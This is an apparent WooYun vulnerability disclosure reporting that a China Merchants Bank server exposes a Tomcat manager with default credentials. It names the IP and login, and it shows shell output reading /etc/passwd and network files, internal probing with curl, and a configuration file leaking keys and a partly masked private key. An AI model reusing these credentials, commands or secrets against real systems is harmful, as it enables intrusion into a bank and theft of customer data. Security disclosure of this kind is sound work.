乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-21: 细节已通知厂商并且等待厂商处理中 2015-04-21: 厂商已经确认,细节仅向厂商公开 2015-05-01: 细节向核心白帽子及相关领域专家公开 2015-05-11: 细节向普通白帽子公开 2015-05-21: 细节向实习白帽子公开 2015-06-05: 细节向公众公开
招商银行某服务器存在漏洞可SHELL(穿透边界防火墙连通内网),毕竟银行系统不敢深入
http://61.152.151.203:8001/manager/htmltomcat:tomcat跟招商银行微信+银行卡相关的系统
cmb/card_getCardDetail.actioncmb/card_getCardForWeixin.action
cat /etc/resolv.confsearch cmbccd.cmbchina.comnameserver 10.48.64.6nameserver 10.48.64.7nameserver 10.47.1.11cat /etc/hosts127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4::1 localhost localhost.localdomain localhost6 localhost6.localdomain6127.0.1.1 SCCWECHAT02101.cmbccd.cmbchina.com SCCWECHAT02101
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/dev/nulldaemon:x:2:2:daemon:/sbin:/dev/nulladm:x:3:4:adm:/var/adm:/dev/nulllp:x:4:7:lp:/var/spool/lpd:/dev/nullsync:x:5:0:sync:/sbin:/dev/nullshutdown:x:6:0:shutdown:/sbin:/dev/nullhalt:x:7:0:halt:/sbin:/dev/nullmail:x:8:12:mail:/var/spool/mail:/dev/nulluucp:x:10:14:uucp:/var/spool/uucp:/dev/nulloperator:x:11:0:operator:/root:/dev/nullgames:x:12:100:games:/usr/games:/dev/nullgopher:x:13:30:gopher:/var/gopher:/dev/nullftp:x:14:50:FTP User:/var/ftp:/dev/nullnobody:x:99:99:Nobody:/:/dev/nulldbus:x:81:81:System message bus:/:/dev/nullvcsa:x:69:69:virtual console memory owner:/dev:/dev/nullrpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/dev/nullabrt:x:173:173::/etc/abrt:/dev/nullrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/dev/nullnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/dev/nullhaldaemon:x:68:68:HAL daemon:/:/dev/nullntp:x:38:38::/etc/ntp:/dev/nullsaslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/dev/nullpostfix:x:89:89::/var/spool/postfix:/dev/nullsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/dev/nulltcpdump:x:72:72::/:/dev/nulloprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/dev/nulladmin:x:0:0::/home/admin:/bin/bashuseradmin:x:500:10::/home/useradmin:/bin/bashimcc:x:501:501::/home/imcc:/bin/bash
这台服务器与10网段的内网相连curl http://10.48.88.56:8088
<html><head><title>Apache Tomcat/6.0.35 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - There is no Action mapped for namespace [/] and action name [] associated with context path [].</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>There is no Action mapped for namespace [/] and action name [] associated with context path [].</u></p><p><b>description</b> <u>The requested resource (There is no Action mapped for namespace [/] and action name [] associated with context path [].) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.35</h3></body></html>
#==================================##OAuth#================================#Encrypt_Key=cmb**.**#==================================##cmb积分红包#==================================##==测试环境==#活动结束时间activityEndTime=2015-02-27 00:00:00#调用接口ipip=http://10.48.**.**:8088#获取jsapi_ticketjsapi_ticket=http://10.48.**.**:8088/repoints/repoints_getWXjsAPIticket.action#判断用户是否绑定isBind=/repoints/repoints_isBind.action#获取总积分queryTotalPoints=/repoints/repoints_queryAvaiPoints.action#获取手机验证码getCaptcha=/repoints/repoints_getValidateCode.action#创建红包crtRedEnvelope=/repoints/repoints_crtRedEnvelope.action#根据红包id获取被抢的红包及其明细getREDetails=/repoints/repoints_getREDetailsByREId.action#根据红包id获取被抢的红包及其明细drawRedEnvelope=/repoints/repoints_drawRedEnvelope.action#根据openid获取所有红包及其被抢的明细getAllREPoints=/repoints/repoints_getAllREPointsByOpenid.action#根据openid获取抢到的红包及其明细getDrawRedEnvelope=/repoints/repoints_getRedEnvelopeByOpenId.action#领红包accountPoints=/repoints/repoints_accountPoints.action#==================================##微信js-sdk#==================================##生成签名的随机字符串noncestr=CMB20**.**lope#==================================##私钥#==================================##私钥prikey=MIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBANHgRp2RmBIGbCjhNU33HITz34w97g7iDSajwx35HqPZH+wmupNdaRaOXbVmjoV72o5xhqQ/TEPXztHxv5/rpra9VsXXlzv9lHrkjqWtjwgAcf0JuMGAAV9waGzfw7tUlIV/QRoDZgLje+9Jv3JWbHEBUsP5motEqI9fwwn5TSAlAgMBAAECgYBEM56e+74wNVgWnMDGukPRTLLbjxB6U6k0Ykk4x0jWs+s0wY0l8FgDFXaMSWyNIidu3KOFYnB1J381KFs+K8T7zHdolI4kUs1gclDEdv2QSqAP8t54AbY+eeASxNomy98mDGxftQuWjcfPiYVAGmYp248aNRdZdI6cHJFVEb7S4QJBAPXwszGTg/cSUxhmYYM52IA8Q1vMJpim960q+bCHZTpg6wfeielftQbfWn00F0lbZiEy5vGGMT7X+JaSCW5+NskCQQDadfB2c+5xWZhrxkpAKV4XA7ODgtB9IyIHzFdxMWblCSLR2JQNJaud9OE7s0GSZPp1d6Cvu/6ewzPCVZvbmWB9AkEA8+Ufz6pa1Ep33VqqmVhkO8eHhSGPpRLvy+s**************************************************************************uwRWV8zzjzAc4ylKvr2uY5FmUHn96Lw=share_page_url=http://pointsbonus.cmbchina.com/bindpoints/bindPointsIndexredirect_Url=http://www.baidu.comdecrypt_Key=cmbedcba#yaoyuan.150331backstage_url=http://10.48.**.**:8088/bindPoints/points_shareRecord.action<?xml version="1.0" encoding="UTF-8"?><root> <AttentionAwoke> <!-- 重发次数 --> <sendNum>3</sendNum> <comefrom>161</comefrom> <!-- new相关配置信息 --> <title>官方微信智能语音邀您体验--随时申请调高信用额度--快速定位周边优惠商户、特价影院、招行网点、ATM--让“小招”常驻手机桌面,快速掌握您的用卡信息</title> <description>3秒查账单、查积分、查额度--随时申请调高信用额度--周边优惠商户、招行网点--让“小招”出现在手机桌面</description> <picUrl>http://market.cmbchina.com/ccard/weixin/news/20140122/640b.jpg--http://market.cmbchina.com/ccard/weixin/news/20140122/a.gif--http://market.cmbchina.com/ccard/weixin/news/20140122/b.gif--http://market.cmbchina.com/ccard/weixin/news/20140122/c.jpg</picUrl> <url>http://market.cmbchina.com/ccard/weixin/news/20140122/--http://market.cmbchina.com/ccard/weixin/news/20130916/--http://market.cmbchina.com/ccard/weixin/news/20140120_lbs/--http://market.cmbchina.com/ccard/weixin/news/20140120_kjzm/</url> <!-- UAT --> </AttentionAwoke> <weixingUrl> <!-- 是否启动从鉴权机获取token --> <getToken>true</getToken> <!-- 生产环境 --> <!-- <newtoken>http://10.48.**.**:8081/system/weixin!gettoken.action</newtoken> <getToken>http://10.48.**.**:8090/cgi-bin/token</getToken> <api>http://10.48..**.**:8090/cgi-bin/</api> --> <!-- 测试环境 --> <getToken>http://api.weixin.qq.com/cgi-bin/token</getToken> <api>http://api.weixin.qq.com/cgi-bin/</api> <newtoken>http://192.168..**.**:8781/system/weixin!gettoken.action </newtoken> </weixingUrl> <CARD> <page_size>10</page_size> <page_url>system/card_getBatchCard</page_url> <get_card_url>http://192.168.**.**:8027/cmb/card_getCardForWeixin.action</get_card_url> <card_detail_url>http://192.168.**.**:8027/cmb/card_getCardDetail.action</card_detail_url> <card_info_url>/jsp/card/cardInfo.jsp?wechat_card_js=1</card_info_url> </CARD></root>
这个就不要开放在外网了吧
危害等级:高
漏洞Rank:11
确认时间:2015-04-21 23:16
感谢对招商银行安全的关注。
暂无